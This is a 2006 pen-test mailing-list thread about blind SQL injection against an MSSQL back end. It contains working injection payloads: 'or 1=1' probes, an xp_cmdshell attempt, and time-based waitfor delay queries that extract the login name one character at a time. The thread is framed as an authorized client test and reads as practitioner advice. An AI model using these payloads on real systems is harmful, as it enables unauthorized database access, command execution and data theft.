Hi,
Try something like this
;if system_user = char(115)+char(97) waitfor delay '0:0:05';--
But if you really want to determine the connection user, break system_user
with substring() and test each character...
if (SELECT ASCII(SUBSTRING((a.loginame),1,1)) FROM master..sysprocesses AS a
WHERE a.spid = @@SPID) > 76 waitfor delay '00:00:05';--
A tool like absinthe (0x90.org) would help you.
[]'s
Leo
----- Original Message -----
From: <One2@onetwo.com>
To: <pen-test@securityfocus.com>
Sent: Wednesday, December 13, 2006 5:41 AM
Subject: Blind SQL Injection Techniques
Hi All,
I am testing a client at the moment who has a Blind SQL Injection
vulnerability and am running out of techniques, so need some tips.
I injected the following string to validate that the system has an MSSQL
server at the back-end.
or 1=1;select * from sysobjects;--
This returned a valid page.
Also injected the following and got a valid page, but again no data since
it is completely blind.
or 1=1;select @@version;--
Replacing sysobjects, in the first example, with an invalid table returns
a custom error page that doesn't disclose anything.
It seems that when injecting any invalid sql statement I get the same
custom error page coming back that doesn't reveal any information.
My next step was to determine whether the DB was running as system. I
tried using the following command;
or 1=1;if (select user) = 'sa' waitfor delay '0:0:5';--
... but got the error page, indicating that it didn't work - especially
since it didn't take 5 seconds. I then tried simplifying it to just;
waitfor delay '0:0:5';--
... but again, the error page, indicating this command was not working. I
thought it was the quotes but the following were successful;
or 1=1;select * from 'sysobjects';--
or 1=1;select * from "sysobjects";--
I then tried the following to see if I could actually run system commands;
or 1=1;exec master..xp_cmdshell dir;--
... but this got the error page again indicating unsuccessful.
Any suggestions on gaining further information or access on this system
would be appreciated.
Thanks,
One2
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------
Esta mensagem foi verificada pelo E-mail Protegido Terra.
Scan engine: McAfee VirusScan / Atualizado em 13/12/2006 / Versão:
4.4.00/4918
Proteja o seu e-mail Terra: http://mail.terra.com.br/
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------
